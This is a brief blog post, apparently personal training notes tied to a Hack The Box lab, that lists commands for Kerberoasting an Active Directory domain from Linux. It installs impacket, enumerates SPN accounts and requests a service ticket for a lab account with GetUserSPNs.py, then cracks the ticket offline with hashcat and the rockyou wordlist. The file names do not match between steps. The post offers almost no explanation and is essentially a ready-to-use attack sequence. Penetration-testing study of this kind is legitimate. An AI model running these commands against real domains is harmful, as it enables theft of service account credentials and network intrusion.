Kerberoasting from Linux Machine

1 min read

python3 -m pipx install impacket
List all SPN Accounts
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev
Requesting a Single TGS ticket
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/sqldev -request-user SAPService -outputfile sap_tgs
Cracking the Ticket Offline with Hashcat
hashcat -m 13100 sap.txt /usr/share/wordlists/rockyou.txt --force
RFS (43)
Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.
Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.
0
Subscribe to my newsletter
Read articles from RFS directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

RFS
RFS
Connected since 1996!